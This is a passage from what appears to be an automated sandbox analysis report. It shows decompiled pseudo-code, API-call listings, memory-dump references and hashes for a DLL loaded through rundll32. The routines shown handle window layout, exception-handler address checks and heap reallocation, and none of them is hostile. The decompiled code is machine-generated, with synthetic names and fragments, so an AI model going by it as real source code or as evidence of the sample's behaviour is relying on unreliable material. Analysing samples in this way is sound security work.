                                                                                                            						_push(_t158 - 0x58);
                                                                                                            						E1002095F(_t155);
                                                                                                            						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
                                                                                                            					}
                                                                                                            					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
                                                                                                            					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
                                                                                                            						_t81 = _t80 & 0xfffffffe;
                                                                                                            					} else {
                                                                                                            						_t81 = _t80 | 0x00000001;
                                                                                                            					}
                                                                                                            					E100383D0(_t155, _t81);
                                                                                                            					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
                                                                                                            					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
                                                                                                            						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
                                                                                                            						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
                                                                                                            					}
                                                                                                            					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
                                                                                                            					if( *(_t158 + 0xbc) == 0) {
                                                                                                            						_t57 = _t125 + 0x94; // 0x94
                                                                                                            						_t150 = _t57;
                                                                                                            						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
                                                                                                            						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
                                                                                                            						_t85 =  *0x1004efa4; // 0x2
                                                                                                            						_t151 = 0;
                                                                                                            						_t87 =  *0x1004efa0; // 0x2
                                                                                                            						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
                                                                                                            					} else {
                                                                                                            						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
                                                                                                            						E10028E5A(_t125, _t158 - 0x68);
                                                                                                            						asm("cdq");
                                                                                                            						asm("cdq");
                                                                                                            						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
                                                                                                            						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
                                                                                                            						_push( *((intOrPtr*)(_t158 + 0xb8)));
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						 *(_t158 - 0x70) = E1002CE2A(_t125);
                                                                                                            						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
                                                                                                            						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                                                            						_t151 = 0;
                                                                                                            					}
                                                                                                            					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
                                                                                                            						E1000870E(_t155, _t125);
                                                                                                            					}
                                                                                                            					_t133 =  *((intOrPtr*)(_t155 + 0x88));
                                                                                                            					if(_t133 != _t125) {
                                                                                                            						if(_t133 != _t151) {
                                                                                                            							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
                                                                                                            								_t95 = 0;
                                                                                                            							} else {
                                                                                                            								_t95 = 1;
                                                                                                            							}
                                                                                                            							_push(_t95);
                                                                                                            							_push(0xffffffff);
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_push(_t151);
                                                                                                            						_push( *(_t158 - 0x70));
                                                                                                            						L27:
                                                                                                            						_push(_t155);
                                                                                                            						E1002D1B2(_t133);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
                                                                                                            					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
                                                                                                            						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
                                                                                                            					}
                                                                                                            					E1002D14B(_t125, _t125, _t158, _t155);
                                                                                                            					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
                                                                                                            				}
                                                                                                            				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
                                                                                                            			}
                                                                                                            0x1002da49
                                                                                                            0x1002da4f
                                                                                                            0x1002da5a
                                                                                                            0x1002da5a
                                                                                                            0x1002da62
                                                                                                            0x1002da6e
                                                                                                            0x1002da6e
                                                                                                            0x1002da8a

                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32 ref: 1002D84C
                                                                                                            • EqualRect.USER32 ref: 1002D872
                                                                                                            • IsWindowVisible.USER32(?), ref: 1002D900
                                                                                                            • CopyRect.USER32 ref: 1002D93C
                                                                                                            • GetParent.USER32(?), ref: 1002D9FA
                                                                                                              • Part of subcall function 1000870E: SetParent.USER32(?,00000000,1002ADB9,00007FFF,?,00000000,?), ref: 1000871D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 545338366-0
                                                                                                            • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                                                            • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10014691(signed int _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                                            				signed int _t51;
                                                                                                            				void* _t52;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t55;
                                                                                                            				signed int _t56;
                                                                                                            				signed int _t57;
                                                                                                            				signed int* _t60;
                                                                                                            				intOrPtr* _t61;
                                                                                                            				intOrPtr _t63;
                                                                                                            				signed int _t64;
                                                                                                            				signed int* _t66;
                                                                                                            				signed int _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				void* _t69;
                                                                                                            				signed int _t70;
                                                                                                            				void* _t71;
                                                                                                            				intOrPtr _t73;
                                                                                                            				void _t74;
                                                                                                            				signed int _t75;
                                                                                                            				signed int _t76;
                                                                                                            				short* _t77;
                                                                                                            				void* _t79;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t82;
                                                                                                            				signed int _t83;
                                                                                                            				intOrPtr _t88;
                                                                                                            				signed int _t91;
                                                                                                            				signed int _t92;
                                                                                                            				signed int _t93;
                                                                                                            
                                                                                                            				_t92 = _a4;
                                                                                                            				_t69 =  *(_t92 + 8);
                                                                                                            				if((_t69 & 0x00000003) != 0) {
                                                                                                            					L3:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_a4 =  *[fs:0x18];
                                                                                                            				_t51 = _a4;
                                                                                                            				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                                                            				_v8 = _t73;
                                                                                                            				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                                                            					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                                                            					__eflags = _t88 - 0xffffffff;
                                                                                                            					if(_t88 != 0xffffffff) {
                                                                                                            						_t81 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						_a4 = 0;
                                                                                                            						_t52 = _t69;
                                                                                                            						do {
                                                                                                            							_t74 =  *_t52;
                                                                                                            							__eflags = _t74 - 0xffffffff;
                                                                                                            							if(_t74 == 0xffffffff) {
                                                                                                            								goto L9;
                                                                                                            							}
                                                                                                            							__eflags = _t74 - _t81;
                                                                                                            							if(_t74 >= _t81) {
                                                                                                            								L41:
                                                                                                            								_t56 = 0;
                                                                                                            								L57:
                                                                                                            								return _t56;
                                                                                                            							}
                                                                                                            							L9:
                                                                                                            							__eflags =  *(_t52 + 4);
                                                                                                            							if( *(_t52 + 4) != 0) {
                                                                                                            								_t13 =  &_a4;
                                                                                                            								 *_t13 = _a4 + 1;
                                                                                                            								__eflags =  *_t13;
                                                                                                            							}
                                                                                                            							_t81 = _t81 + 1;
                                                                                                            							_t52 = _t52 + 0xc;
                                                                                                            							__eflags = _t81 - _t88;
                                                                                                            						} while (_t81 <= _t88);
                                                                                                            						__eflags = _a4;
                                                                                                            						if(_a4 == 0) {
                                                                                                            							L15:
                                                                                                            							_t53 =  *0x1004f590; // 0x0
                                                                                                            							_t91 = _t69 & 0xfffff000;
                                                                                                            							_t93 = 0;
                                                                                                            							__eflags = _t53;
                                                                                                            							if(_t53 <= 0) {
                                                                                                            								L18:
                                                                                                            								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                                                            								__eflags = _t55;
                                                                                                            								if(_t55 == 0) {
                                                                                                            									L56:
                                                                                                            									_t56 = _t55 | 0xffffffff;
                                                                                                            									__eflags = _t56;
                                                                                                            									goto L57;
                                                                                                            								}
                                                                                                            								__eflags = _v36.Type - 0x1000000;
                                                                                                            								if(_v36.Type != 0x1000000) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								__eflags = _v36.Protect & 0x000000cc;
                                                                                                            								if((_v36.Protect & 0x000000cc) == 0) {
                                                                                                            									L28:
                                                                                                            									_t57 = InterlockedExchange(0x1004f5d8, 1);
                                                                                                            									__eflags = _t57;
                                                                                                            									if(_t57 != 0) {
                                                                                                            										goto L5;
                                                                                                            									}
                                                                                                            									_t75 =  *0x1004f590; // 0x0
                                                                                                            									__eflags = _t75;
                                                                                                            									_t82 = _t75;
                                                                                                            									if(_t75 <= 0) {
                                                                                                            										L33:
                                                                                                            										__eflags = _t82;
                                                                                                            										if(_t82 != 0) {
                                                                                                            											L40:
                                                                                                            											InterlockedExchange(0x1004f5d8, 0);
                                                                                                            											goto L5;
                                                                                                            										}
                                                                                                            										_t70 = 0xf;
                                                                                                            										__eflags = _t75 - _t70;
                                                                                                            										if(_t75 <= _t70) {
                                                                                                            											_t70 = _t75;
                                                                                                            										}
                                                                                                            										_t83 = 0;
                                                                                                            										__eflags = _t70;
                                                                                                            										if(_t70 < 0) {
                                                                                                            											L38:
                                                                                                            											__eflags = _t75 - 0x10;
                                                                                                            											if(_t75 < 0x10) {
                                                                                                            												_t76 = _t75 + 1;
                                                                                                            												__eflags = _t76;
                                                                                                            												 *0x1004f590 = _t76;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										} else {
                                                                                                            											do {
                                                                                                            												_t60 = 0x1004f598 + _t83 * 4;
                                                                                                            												_t83 = _t83 + 1;
                                                                                                            												__eflags = _t83 - _t70;
                                                                                                            												 *_t60 = _t91;
                                                                                                            												_t91 =  *_t60;
                                                                                                            											} while (_t83 <= _t70);
                                                                                                            											goto L38;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t61 = 0x1004f594 + _t75 * 4;
                                                                                                            									while(1) {
                                                                                                            										__eflags =  *_t61 - _t91;
                                                                                                            										if( *_t61 == _t91) {
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										_t82 = _t82 - 1;
                                                                                                            										_t61 = _t61 - 4;
                                                                                                            										__eflags = _t82;
                                                                                                            										if(_t82 > 0) {
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									goto L33;
                                                                                                            								}
                                                                                                            								_t77 = _v36.AllocationBase;
                                                                                                            								__eflags =  *_t77 - 0x5a4d;
                                                                                                            								if( *_t77 != 0x5a4d) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                                                            								__eflags =  *_t55 - 0x4550;
                                                                                                            								if( *_t55 != 0x4550) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                                                            								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t71 = _t69 - _t77;
                                                                                                            								__eflags =  *((short*)(_t55 + 6));
                                                                                                            								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                                                            								if( *((short*)(_t55 + 6)) <= 0) {
                                                                                                            									goto L56;
                                                                                                            								}
                                                                                                            								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                            								__eflags = _t71 - _t63;
                                                                                                            								if(_t71 < _t63) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
                                                                                                            								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t79 + 0x27) & 0x00000080;
                                                                                                            								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
                                                                                                            									goto L41;
                                                                                                            								}
                                                                                                            								goto L28;
                                                                                                            							} else {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L16:
                                                                                                            								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t93 = _t93 + 1;
                                                                                                            								__eflags = _t93 - _t53;
                                                                                                            								if(_t93 < _t53) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L18;
                                                                                                            							}
                                                                                                            							__eflags = _t93;
                                                                                                            							if(_t93 <= 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							_t64 = InterlockedExchange(0x1004f5d8, 1);
                                                                                                            							__eflags = _t64;
                                                                                                            							if(_t64 != 0) {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            								L53:
                                                                                                            								_t80 = 0;
                                                                                                            								__eflags = _t93;
                                                                                                            								if(_t93 < 0) {
                                                                                                            									L55:
                                                                                                            									InterlockedExchange(0x1004f5d8, 0);
                                                                                                            									goto L5;
                                                                                                            								} else {
                                                                                                            									goto L54;
                                                                                                            								}
                                                                                                            								do {
                                                                                                            									L54:
                                                                                                            									_t66 = 0x1004f598 + _t80 * 4;
                                                                                                            									_t80 = _t80 + 1;
                                                                                                            									__eflags = _t80 - _t93;
                                                                                                            									 *_t66 = _t91;
                                                                                                            									_t91 =  *_t66;
                                                                                                            								} while (_t80 <= _t93);
                                                                                                            								goto L55;
                                                                                                            							}
                                                                                                            							_t67 =  *0x1004f590; // 0x0
                                                                                                            							_t43 = _t67 - 1; // -1
                                                                                                            							_t93 = _t43;
                                                                                                            							__eflags = _t93;
                                                                                                            							if(_t93 < 0) {
                                                                                                            								L49:
                                                                                                            								__eflags = _t67 - 0x10;
                                                                                                            								if(_t67 < 0x10) {
                                                                                                            									_t67 = _t67 + 1;
                                                                                                            									__eflags = _t67;
                                                                                                            									 *0x1004f590 = _t67;
                                                                                                            								}
                                                                                                            								_t46 = _t67 - 1; // 0x0
                                                                                                            								_t93 = _t46;
                                                                                                            								goto L53;
                                                                                                            							} else {
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L46:
                                                                                                            								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
                                                                                                            								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t93 = _t93 - 1;
                                                                                                            								__eflags = _t93;
                                                                                                            								if(_t93 >= 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t93;
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L55;
                                                                                                            								}
                                                                                                            								goto L53;
                                                                                                            							}
                                                                                                            							goto L49;
                                                                                                            						}
                                                                                                            						_t68 =  *((intOrPtr*)(_t92 - 8));
                                                                                                            						__eflags = _t68 - _v8;
                                                                                                            						if(_t68 < _v8) {
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            						__eflags = _t68 - _t92;
                                                                                                            						if(_t68 >= _t92) {
                                                                                                            							goto L41;
                                                                                                            						}
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					_t56 = 1;
                                                                                                            					goto L57;
                                                                                                            				} else {
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            			}



































                                                                                                            0x1001472b
                                                                                                            0x10014732
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014738
                                                                                                            0x10014739
                                                                                                            0x1001473b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001473b
                                                                                                            0x10014836
                                                                                                            0x10014838
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001484b
                                                                                                            0x1001484d
                                                                                                            0x1001484f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014855
                                                                                                            0x1001485c
                                                                                                            0x1001488c
                                                                                                            0x1001488c
                                                                                                            0x1001488e
                                                                                                            0x10014890
                                                                                                            0x100148a4
                                                                                                            0x100148ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x1001489b
                                                                                                            0x1001489c
                                                                                                            0x1001489e
                                                                                                            0x100148a0
                                                                                                            0x100148a0
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x1001485e
                                                                                                            0x10014863
                                                                                                            0x10014863
                                                                                                            0x10014866
                                                                                                            0x10014868
                                                                                                            0x1001487a
                                                                                                            0x1001487a
                                                                                                            0x1001487d
                                                                                                            0x1001487f
                                                                                                            0x1001487f
                                                                                                            0x10014880
                                                                                                            0x10014880
                                                                                                            0x10014885
                                                                                                            0x10014885
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x10014871
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014873
                                                                                                            0x10014873
                                                                                                            0x10014874
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014874
                                                                                                            0x10014876
                                                                                                            0x10014878
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x10014878
                                                                                                            0x10014704
                                                                                                            0x10014707
                                                                                                            0x1001470a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014710
                                                                                                            0x10014712
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014712
                                                                                                            0x100146cf
                                                                                                            0x100146d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2947987494-0
                                                                                                            • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                                                            • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				long _t30;
                                                                                                            				long _t31;
                                                                                                            				long _t33;
                                                                                                            				void* _t36;
                                                                                                            				long _t38;
                                                                                                            				long _t41;
                                                                                                            				long _t42;
                                                                                                            				long _t44;
                                                                                                            				long _t46;
                                                                                                            				void* _t59;
                                                                                                            				long _t61;
                                                                                                            				void* _t67;
                                                                                                            				void* _t68;
                                                                                                            
                                                                                                            				_push(0x14);
                                                                                                            				_push(0x10041dc0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t59 =  *(_t67 + 8);
                                                                                                            				if(_t59 != 0) {
                                                                                                            					_t61 =  *(_t67 + 0xc);
                                                                                                            					__eflags = _t61;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags =  *0x10050a64 - 3;
                                                                                                            						if( *0x10050a64 != 3) {
                                                                                                            							while(1) {
                                                                                                            								_t28 = 0;
                                                                                                            								__eflags = _t61 - 0xffffffe0;
                                                                                                            								if(_t61 <= 0xffffffe0) {
                                                                                                            									__eflags = _t61;
                                                                                                            									if(_t61 == 0) {
                                                                                                            										_t61 = 1;
                                                                                                            										__eflags = 1;
                                                                                                            									}
                                                                                                            									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                                                            								}
                                                                                                            								__eflags = _t28;
                                                                                                            								if(_t28 != 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								__eflags =  *0x1004f58c; // 0x0
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								_t30 = E10014676(_t61);
                                                                                                            								__eflags = _t30;
                                                                                                            								if(_t30 != 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            							goto L37;
                                                                                                            						} else {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L5:
                                                                                                            							 *(_t67 - 0x1c) = 0;
                                                                                                            							__eflags = _t61 - 0xffffffe0;
                                                                                                            							if(_t61 > 0xffffffe0) {
                                                                                                            								L25:
                                                                                                            								_t28 =  *(_t67 - 0x1c);
                                                                                                            								__eflags =  *(_t67 - 0x1c);
                                                                                                            								if( *(_t67 - 0x1c) != 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								__eflags =  *0x1004f58c; // 0x0
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L37;
                                                                                                            								}
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							E10013A38(0, _t59, 4);
                                                                                                            							 *(_t67 - 4) = 0;
                                                                                                            							_t33 = E10013B9B(_t59);
                                                                                                            							 *(_t67 - 0x20) = _t33;
                                                                                                            							__eflags = _t33;
                                                                                                            							if(_t33 == 0) {
                                                                                                            								L21:
                                                                                                            								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                                                            								E100124B7();
                                                                                                            								__eflags =  *(_t67 - 0x20);
                                                                                                            								if( *(_t67 - 0x20) == 0) {
                                                                                                            									__eflags = _t61;
                                                                                                            									if(_t61 == 0) {
                                                                                                            										_t61 = 1;
                                                                                                            										__eflags = 1;
                                                                                                            									}
                                                                                                            									_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                                                            									__eflags = _t61;
                                                                                                            									 *(_t67 + 0xc) = _t61;
                                                                                                            									 *(_t67 - 0x1c) = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
                                                                                                            								}
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = _t61 -  *0x10050a50; // 0x0
                                                                                                            							if(__eflags <= 0) {
                                                                                                            								_push(_t61);
                                                                                                            								_push(_t59);
                                                                                                            								_push(_t33);
                                                                                                            								_t41 = E1001409B();
                                                                                                            								_t68 = _t68 + 0xc;
                                                                                                            								__eflags = _t41;
                                                                                                            								if(_t41 == 0) {
                                                                                                            									_push(_t61);
                                                                                                            									_t42 = E1001437A();
                                                                                                            									 *(_t67 - 0x1c) = _t42;
                                                                                                            									__eflags = _t42;
                                                                                                            									if(_t42 != 0) {
                                                                                                            										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                                                            										 *(_t67 - 0x24) = _t44;
                                                                                                            										__eflags = _t44 - _t61;
                                                                                                            										if(_t44 >= _t61) {
                                                                                                            											_t44 = _t61;
                                                                                                            										}
                                                                                                            										E10011440( *(_t67 - 0x1c), _t59, _t44);
                                                                                                            										_t46 = E10013B9B(_t59);
                                                                                                            										 *(_t67 - 0x20) = _t46;
                                                                                                            										_push(_t59);
                                                                                                            										_push(_t46);
                                                                                                            										E10013BC6();
                                                                                                            										_t68 = _t68 + 0x18;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									 *(_t67 - 0x1c) = _t59;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *(_t67 - 0x1c);
                                                                                                            							if( *(_t67 - 0x1c) == 0) {
                                                                                                            								__eflags = _t61;
                                                                                                            								if(_t61 == 0) {
                                                                                                            									_t61 = 1;
                                                                                                            									__eflags = 1;
                                                                                                            									 *(_t67 + 0xc) = 1;
                                                                                                            								}
                                                                                                            								_t61 = _t61 + 0x0000000f & 0xfffffff0;
                                                                                                            								 *(_t67 + 0xc) = _t61;
                                                                                                            								_t36 = HeapAlloc( *0x10050a60, 0, _t61);
                                                                                                            								 *(_t67 - 0x1c) = _t36;
                                                                                                            								__eflags = _t36;
                                                                                                            								if(_t36 != 0) {
                                                                                                            									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
                                                                                                            									 *(_t67 - 0x24) = _t38;
                                                                                                            									__eflags = _t38 - _t61;
                                                                                                            									if(_t38 >= _t61) {
                                                                                                            										_t38 = _t61;
                                                                                                            									}
                                                                                                            									E10011440( *(_t67 - 0x1c), _t59, _t38);
                                                                                                            									_push(_t59);
                                                                                                            									_push( *(_t67 - 0x20));
                                                                                                            									E10013BC6();
                                                                                                            									_t68 = _t68 + 0x14;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L21;
                                                                                                            							L27:
                                                                                                            							_t31 = E10014676(_t61);
                                                                                                            							__eflags = _t31;
                                                                                                            						} while (_t31 != 0);
                                                                                                            						goto L36;
                                                                                                            					} else {
                                                                                                            						_push(_t59);
                                                                                                            						E100107C8(0, _t59, _t61, __eflags);
                                                                                                            						L36:
                                                                                                            						_t28 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						goto L37;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t28 = E100107B6( *(_t67 + 0xc));
                                                                                                            					L37:
                                                                                                            					return E1001254F(_t28);
                                                                                                            				}
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
